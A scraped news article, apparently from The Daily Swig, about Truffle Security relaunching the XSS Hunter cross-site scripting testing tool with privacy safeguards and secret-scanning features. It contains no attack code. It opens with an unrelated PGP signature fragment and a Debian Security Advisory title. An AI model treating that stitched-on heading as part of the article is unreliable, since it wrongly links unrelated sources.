G6edx+RrdXMS7nuuzH+rlCkGRJ9oszyHlcpV0cFI4/ss5ljY9rtrw7cs3qN2kZz5  
RrtXMAQc0xXLTZJTozNsqf7ael4mWfUoc809BMRobJ1m1bBTWTA=Pibq  
-----END PGP SIGNATURE-----

Debian Security Advisory 5335-1

Popular hacking aid resurrected following end-of-life announcement

Popular hacking aid resurrected following end-of-life announcement

XSS Hunter now has a home at Truffle Security, which has launched a new version of the tool after its original creator declared that he will be deprecating it in February.

XSS Hunter is a popular open source tool for identifying cross-site scripting (XSS) bugs in websites. An online version was previously maintained by its creator Mandatory (Matthew Bryant).

The new version, hosted on Truffle Security’s domain, is an open source fork of the original code with new features and enhanced security.

**Privacy concerns**

XSS is a very common vulnerability, accounting for 23% of bug reports submitted to bug bounty platform HackerOne, for example.

“The most popular tool for looking for XSS aside from manual testing is XSSHunter,” Dylan Ayrey, co-founder of Truffle Security, told The Daily Swig. “It’s an extremely valuable tool to the community, but it also had risks.”

Many users of XSS Hunter would accidentally send sensitive data to the platform and possibly cause data leakage. Ayrey had previously stumbled on 50,000 Google user records while working with the old XSS Hunter, which became the topic of a talk he gave at Black Hat 2022.

“As long as Mandatory was in charge of the service, I wasn’t concerned with what the platform might do with that data collected,” Ayrey said.

“But we were concerned after the EOL \[end of life\] was announced, another tool might have come along to replace it with operators that may have had different intentions with the data collected.”

Read more of the latest news about web hacking tools

The new XSS Hunter tool blurs screenshots captured by the platform to protect sensitive information rendered by the XSS payload. It has also removed support for full DOM capture and enforces Google SSO login to improve account security.

Regarding the deprecation of the old service, Mandatory told The Daily Swig that he had become “increasingly uncomfortable with the amount of vulnerability information stored in the service.

“Ideally I’d like to be storing zero vulnerability information for XSS hunter users, which this deprecation will achieve,” he said.

Mandatory described Truffle Security’s fork as “a step in the right direction” and said: “I think the fact that Truffle Security is starting out with an eye on balancing privacy and bug bounty research interests is a good sign.”

**New features**

Truffle Security has added support for detecting other kinds of vulnerabilities, including cross-origin resource sharing (CORS) misconfigurations that would allow external sites to view and extract data from internal domains. CORS vulnerabilities can be especially damaging, as Truffle Security recently discovered while investigating different internal corporate networks.

Truffle Security has integrated the lite version of its TruffleHog tool into the new XSSHunter, enabling it to scan HTML pages for secrets such as AWS, GCP, and Slack keys. It will also scan tested websites for source code leaks via .git directories.

“We saw an opportunity to both address privacy concerns as well as give the cybersecurity community new capabilities within the XSS Hunter tool,” Ayrey said.

Ayrey said Mandatory was supportive of the effort and helped out in the process. Truffle Security plans to add more features to XSS Hunter in the future, including adding a more complete version of TruffleHog.

Mandatory, who described XSS Hunter as his long time passion project, will continue to maintain the open source xsshunter-express repository “more dutifully in the future to support those who wish to self-host their own instance”.

“When I first built the service many people didn’t really believe that blind XSS was a ‘real’ concern,” he said. “Today I don’t think anyone doubts the pervasiveness and severity of these vulnerabilities, so it has pretty much achieved what it was meant to do.”

YOU MAY ALSO LIKE Meet TruffleHog – a browser extension for finding secret keys in JavaScript code

Tag

#java